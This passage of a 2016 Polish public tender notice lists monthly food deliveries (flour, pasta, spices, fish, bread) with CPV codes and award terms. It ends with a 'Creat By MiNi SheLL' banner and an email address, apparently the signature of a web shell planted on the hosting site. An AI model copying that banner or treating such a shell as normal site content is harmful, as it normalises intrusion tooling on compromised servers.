35	przecier szczawiowy siekany w słoiku 200 g	21	szt.
36	barszcz ukraiński 400g Unifreeze lub równoważny	16	szt.
37	mieszanka 7-mio składnikowa Unifreeze lub równoważna 	6	szt.
38	buraki ćwikłowe	30	kg
39	kukurydza w puszcze 400 g Kwidzyn lub równoważna	8	szt.
40	groszek zielony w puszce - 450g Kwidzyn lub równoważny	10	szt.
41	groszek zielony mrożony - 450g Hortex lub równoważny	4	szt.
42	brokuły świeże	3	kg
43	szczypiorek	8	p
44	papryka surowa	1	kg
45	czosnek	6	szt.
46	soczewica czerwona 350g Sante lub równoważna	1	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa przypraw, makaronów, mąki i kaszy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 

L.p	Nazwa produktu	ilość	Jednostki
1	mąka szymanowska typ 480 lub równoważna	31	kg
2	mąka wieloziarnista Lubella 400g lub równoważna	6	kg
3	mąka pszenna typ 500	5	kg
4	mąka ziemniaczana Kupiec lub równoważna 	1	kg
5	makaron świderki - 400g Anna lub równoważny	72	szt.
6	makaron rosołowy 400 g Vela lub równoważny	55	szt.
7	makaron krajanka 400 g VELA lub równoważny	8	szt.
8	makaron wieloziarnisty Lubella 400g lub równoważny	25	szt.
9	makaron Semolina 500g lub równoważny	17	szt.
10	ryż w saszetkach 400g Kupiec lub równoważny	20	szt.
11	ryż Kupiec lub równoważny	17	kg
12	kasza manna Kupiec lub równoważna	5	kg
13	kasza jęczmienna Kupiec lub równoważna	4	kg
14	kasza jęczmienna w saszetkach 400g Kupiec lub równoważna	14	szt.
15	kasza gryczana w saszetkach 400g Kupiec lub równoważna	11	szt.
16	kasza jaglana 350g Sante lub równoważna	5	szt.
17	otręby pszenne 150g Sante lub równoważne	3	szt.
18	płatki owsiane 400g Kupiec lub równoważne	4	szt.
19	sezam 300g Sante lub równoważny	3	szt.
20	migdały (płatki) 60g Siesta lub równoważne	2	szt.
21	nasiona słonecznika 150g Sante lub równoważne	2	szt.
22	pestki dyni 100g Bakalland lub równoważne	2	szt.
23	groszek ptysiowy 100g Jumar lub równoważny 	11	szt.
24	grzanki 150g Mamut lub równoważne	8	szt.
25	cukier	130	kg
26	cukier waniliowy 16g Delecta lub równoważny	19	szt.
27	sól	9	kg
28	sól morska 350g Sante lub równoważna	16	szt.
29	kwasek cytrynowy 50g Delecta lub równoważny	10	szt.
30	liść laurowy Apetita lub równoważny	7	szt.
31	keczup 900g	1	szt.
32	keczup łagodny w tubce 480 g Włocławek lub równoważny	7	szt.
33	Przyprawa Degusta lub równoważna - 200g	1	szt.
34	barszcz biały 165g Winiary lub równoważny	11	szt.
35	majeranek 20g Cykoria lub równoważny	14	szt.
36	papryka słodka mielona 20g Apetita lub równoważna	11	szt.
37	pieprz mielony 20g Apetita lub równoważny	15	szt.
38	warzywa suszone (liofilizowane) 300g ViVio lub równoważne	9	szt.
39	natka pietruszki suszona 8g Kamis lub równoważna	4	szt.
40	kurkuma 20g Prymat lub równoważna	6	szt.
41	curry Appetita 20g lub równoważna	1	szt.
42	tymianek 10g Apetita lub równowazny	3	szt.
43	zioła prowansalskie 10g Appetita lub równoważne	9	szt.
44	rozmaryn 15g Kamis lub równoważny	2	szt.
45	gałka muszkatołowa mielona 15g Appetita lub równoważna	1	szt.
46	oregano 10g Apetita lub równoważne	7	szt.
47	bazylia 10g Appetita lub równoważna	8	szt.
48	ziele angielskie 20 g Apetita lub równoważne	4	szt.
49	płatki kukurydziane Corn Flakes 600g lub równoważne	5	szt.
50	jajka duże	660	szt.
51	herbata granulowana Lipton 90g lub równoważna	4	szt.
52	olej uniwersalny 1 litr Kujawski lub równoważny	42	szt.
53	oliwa z oliwek 0,5 l Bulerias lub równoważna	4	szt.
54	majonez pomorski Ocetix 620g lub równoważny	4	szt.
55	Ocet 0,5 litra 10%	2	szt.
56	Żurek 0,5 litra	13	szt.
57	cynamon 15g	3	szt
58	pieprz w ziarnach 20g	2	szt.
59	budyń 64g Delecta lub równoważny	20	szt.
60	kisiel 58g Delecta lub równoważny	20	szt.
61	galaretka Delecta 75g lub równoważna	5	szt.
62	herbata ekspresowa (100 torebek) Saga lub równoważna	6	szt.
63	herbata ekspresowa owocowa (25 torebek) Saga lub równoważna	15	szt.
64	mięta w saszetkach Posti 30g lub równoważna	15	szt.
65	mięta świeża w doniczce	4	szt.
66	kakao granulowane puchatek 350g lub równoważne	4	szt.
67	musztarda mała 210g	2	szt.
68	miód naturalny wielokwiatowy 350g Podravka lub równoważny	13	szt.
69	sos spaghetti Łowicz 350g lub równoważny	17	szt.
70	sos sałatkowy 9g Knorr lub równoważny	8	szt.
71	sos buraczany 200g 	3	szt.
72	sos grzybowy 40g Winiary lub równoważny 	9	szt.
73	sos słodko - kwaśny 350g	17	szt.
74	bulion w butelce 200g	1	szt.
75	batony lion 43g lub równoważny	15	szt.
76	krem czekoladowy	15	szt.
77	batony Grześki w polewie 28g lub równoważne	15	szt.
78	batony Góralki 50g lub równoważne	15	szt.
79	soczek ze słomką	15	szt.
80	czekolada gorzka 100g	15	szt.
81	czekolada nadziewana 100g	15	szt.
82	przyprawa vegeta lub równoważna	2	szt.
83	kostki rosołowe 200g	2	szt.
84	ogórki konserwowe 	2	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa ryb..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 

Lp. 	Nazwa produktu	ilość	jednostka
1	ryba panga	4	kg
2	ryba mrożona dorsz 	3	kg
3	ryba mrożona miruna 	23	kg
4	makrela wędzona	5	kg
5	makrela mrożona	2	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 

L.p	Nazwa produktu	Ilość 	Jednostki
1	chleb pełnoziarnisty krojony	60	szt.
2	chleb razowy Swojski lub równoważny	47	szt.
3	chleb krojony	90	szt.
4	bułki grahamki	86	szt.
5	bułki poznańskie	38	szt.
6	bułki kajzerki	270	szt.
7	bułka tarta	31	szt.
8	pączki	12	szt.
9	bułka z kruszonką	32	szt.
10	bułka słodka z dżemem	32	szt.
11	bułka słodka z budyniem	32	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com